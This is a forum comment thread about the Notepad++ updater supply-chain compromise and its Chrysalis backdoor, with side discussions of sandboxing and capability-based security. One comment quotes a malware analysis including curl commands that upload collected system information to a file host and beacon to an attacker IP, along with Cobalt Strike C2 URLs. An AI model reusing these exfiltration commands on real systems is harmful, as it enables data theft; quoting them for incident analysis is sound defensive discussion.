zlacker

Notepad++ supply chain attack breakdown

submitted by natebc+(OP) on 2026-02-03 22:35:27 | 379 points 191 comments
[view article] [source] [go to bottom]

NOTE: showing posts with links only show all posts
◧◩
8. TingPi+fa[view] [source] [discussion] 2026-02-03 23:33:40
>>blueno+s9
Literally yes: https://survey.stackoverflow.co/2025/
21. tonyme+ac[view] [source] 2026-02-03 23:42:00
>>natebc+(OP)
I noticed I had version 8.9 on Dec 28, 2025 and it seems clean according to

https://arstechnica.com/security/2026/02/notepad-updater-was...

I recommend removing notepad++ and installing via winget which installs the EXE directly without the winGUP updater service.

Here's an AI summary explaining who is affected.

Affected Versions: All versions of Notepad++ released prior to version 8.8.9 are considered potentially affected if an update was initiated during the compromise window.

Compromise Window: Between June 2025 and December 2, 2025.

Specific Risk: Users running older versions that utilized the WinGUp update tool were vulnerable to being redirected to malicious servers. These servers delivered trojanized installers containing a custom backdoor dubbed Chrysalis.

◧◩
22. Aviceb+gc[view] [source] [discussion] 2026-02-03 23:42:20
>>Someon+Xb
https://notepad-plus-plus.org/news/8.8.2-available-in-1-week...
◧◩◪
48. da_chi+jh[view] [source] [discussion] 2026-02-04 00:10:27
>>TingPi+fa
This might be a better link: https://survey.stackoverflow.co/2025/technology#1-dev-id-es

It's listed as the third most popular IDE after Visual Studio Code and Visual Studio by respondents to Stack Overflow's annual survey. Interestingly, it's higher among professionals than learners. Maybe that's because learners are going to be using some of those newer AI-adjacent editors, or because learners are less likely to be using Windows at all.

I'm sure people will leap to the defense of their chosen text editor, like they always do. "Oh, they separated vim and Neovim! Those are basically the same! I can combine those, really, to get a better score!" But I think a better takeaway is that it's incredible that Notepad++, an open source application exclusive to Windows that has had, basically, a single developer over the course of 22 years, has managed to reach such a widespread audience. Especially when Scintilla's other related editors (SciTE, EditPlus) essentially don't rate.

◧◩
50. Marsym+Fh[view] [source] [discussion] 2026-02-04 00:14:27
>>troad+P8
The easiest way to action as a user seems like it would be to use local package managers that includes something like Dependabot's cooldown config. I'm not aware of any local package managers that do something like this?

https://docs.github.com/en/code-security/reference/supply-ch...

◧◩◪◨
51. gruez+qi[view] [source] [discussion] 2026-02-04 00:18:54
>>da_chi+jh
>Maybe that's because learners are going to be using some of those newer AI-adjacent editors, or because learners are less likely to be using Windows at all.

You can use the 2022 (ie. pre-chatgpt) results for control for that. The results are basically the same.

https://survey.stackoverflow.co/2022/#most-popular-technolog...

◧◩◪
53. kbelde+nj[view] [source] [discussion] 2026-02-04 00:23:57
>>kotaKa+vc
Same, but additionally Irfanview. And once upon a time, Media Player Classic used to be on that list.

This train of thought made me go find https://www.oldversion.com/. For a while, that was invaluable.

◧◩◪◨⬒
70. kibwen+Vp[view] [source] [discussion] 2026-02-04 01:02:59
>>h4x0rr+Wl
The original model of computer security is "anything running on the machine can do and touch anything it wants to".

A slightly more advanced model, which is the default for OSes today, is to have a notion of a "user", and then you grant certain permissions to a user. For example, for something like Unix, you have the read/write/execute permissions on files that differ for each user. The security mentioned above just involves defining more such permissions than were historically provided by Unix.

But the holy grail of security models is called "capability-based security", which is above and beyond what any current popular OS provides. Rather than the current model which just involves talking about what a process can do (the verbs of the system), a capability involves taking about what a process can do an operation on (the nouns of the system). A "capability" is an unforgeable cryptographic token, managed by the OS itself (sort of like how a typical OS tracks file handles), which grants access to a certain object.

Crucially, this then allows processes to delegate tasks to other processes in a secure way. Because tokens are cryptographically unforgeable, the only way that a process could have possibly gotten the permission to operate on a resource is if it were delegated that permission by some other process. And when delegating, processes can further lock down a capability, e.g. by turning it from read/write to read-only, or they can e.g. completely give up a capability and pass ownership to the other process, etc.

https://en.wikipedia.org/wiki/Capability-based_security

74. nights+ss[view] [source] 2026-02-04 01:21:52
>>natebc+(OP)
Other source: https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-...
◧◩◪◨
80. Findec+cy[view] [source] [discussion] 2026-02-04 02:01:16
>>black_+Ze
FreeBSD used to have an ELF target called "CloudABI" which used Capsicum by default. Parameters to a CloudABI program were passed in a YAML file to a launcher that acquired what was in practice the program's "entitlements"/"app permissions" as capabilities that it passed to the program when it started.

I had been thinking of a way to avoid the CloudABI launcher. The entitlements would instead be in the binary object file, and only reference command-line parameters and system paths. I have also thought of an elaborate scheme with local code signing to verify that only user/admin-approved entitlements get lifted to capabilities.

However, CloudABI got discontinued in favour of WebAssembly (and I got side-tracked...)

Redox is also moving towards having capabilities mapped to fd's, somewhat like Capsicum. Their recent presentation at FOSDEM: https://fosdem.org/2026/schedule/event/KSK9RB-capability-bas...

91. ChrisA+MJ[view] [source] 2026-02-04 03:39:45
>>natebc+(OP)
Related:

Notepad++ hijacked by state-sponsored actors

>>46851548

98. iJohnD+aM[view] [source] 2026-02-04 04:05:25
>>natebc+(OP)
FTA - The original person posting about the unusual behavior was truly helpful.

https://community.notepad-plus-plus.org/topic/27212/autoupda...

Thankfully the responses weren’t outright dismissive, which is usually the case in these situations.

It was thought to be a local compromise and nothing to do Notepad++.

Good lessons to be learned here. Don’t be quick to dismiss things simply because it doesn’t fit what you think should be happening. That’s the whole point. It doesn’t fit, so investigate why.

Most tech support aims to prove the person wrong right out the gate.

◧◩◪
101. Semaph+JT[view] [source] [discussion] 2026-02-04 05:19:25
>>BobbyT+ZK
https://learn.microsoft.com/en-us/windows/security/applicati...

Or the easier way with an external tool is using Sandboxie: https://sandboxie-plus.com/

◧◩◪◨⬒⬓
115. dizhn+v21[view] [source] [discussion] 2026-02-04 06:44:12
>>netsha+ik
For the browser you can use something like Session Buddy. Save the session and move on secure in the knowledge that the tabs are there IF you need them.

https://sessionbuddy.com/

◧◩◪
122. bsder+Z91[view] [source] [discussion] 2026-02-04 07:54:28
>>troad+9b
> Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps.

Linux people are NOT resistant to this. Atomic desktops are picking up momentum and people are screaming for it. Snaps, flatpaks, appimages, etc. are all moving in that direction.

As for plain development, sadly, the OS developers are simply ignoring the people asking. See:

https://github.com/containers/toolbox/issues/183

https://github.com/containers/toolbox/issues/348

https://github.com/containers/toolbox/issues/1470

I'll leave it up to you to speculate why.

Perhaps getting a bit of black eye and some negative attention from the Great Orange Website(tm) can light a fire under some folks.

◧◩
123. kracke+if1[view] [source] [discussion] 2026-02-04 08:33:42
>>indigo+Qp
OP post has an indicators of compromise list, also seen in https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-...

I'm surprised this wasn't linked from the original notepad++ disclosure

◧◩◪◨⬒⬓⬔
131. netsha+xk1[view] [source] [discussion] 2026-02-04 09:14:14
>>dizhn+v21
Thanks, I use https://www.visibotech.com/search/label/FreshStart but Session Buddy looks more polished.
◧◩
135. gus_+Fq1[view] [source] [discussion] 2026-02-04 10:02:51
>>ashish+q9
running apps in a sandbox is ok, but remember to disable internet access. A text editor should not require it, and can be used to exfiltrate the text(s) you're editing.

    When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:

    3 Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;
    4 Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202
--

    The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.
--

    The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin
◧◩◪◨
145. 171862+eK1[view] [source] [discussion] 2026-02-04 12:29:44
>>LostMy+Df
These kind of editors are typically already installed. Pluma, Kate, Emacs, Vi... If anything there is still nano.

And of course “Ed is the standard text editor.”

> https://www.gnu.org/fun/jokes/ed-msg.en.html

◧◩
150. acdha+aR1[view] [source] [discussion] 2026-02-04 13:17:31
>>the_ha+AG1
> developers and users increasingly trust code they haven't personally reviewed.

This has been true since we left the era where you typed the program in each time you ran it. Ken Thompson rather famously wrote about this four decades ago: https://www.cs.umass.edu/~emery/classes/cmpsci691st/readings...

Sandboxing certainly helps but it’s not a panacea: for example, Notepad++ is exactly the kind of utility people would grant access to edit system files and they would have trusted the updater, too.

◧◩◪◨
170. anonno+9w4[view] [source] [discussion] 2026-02-05 04:31:27
>>kwanbi+J92
Happened to Linux Mint, famously: https://www.bitdefender.com/en-us/blog/hotforsecurity/tamper...
[go to top]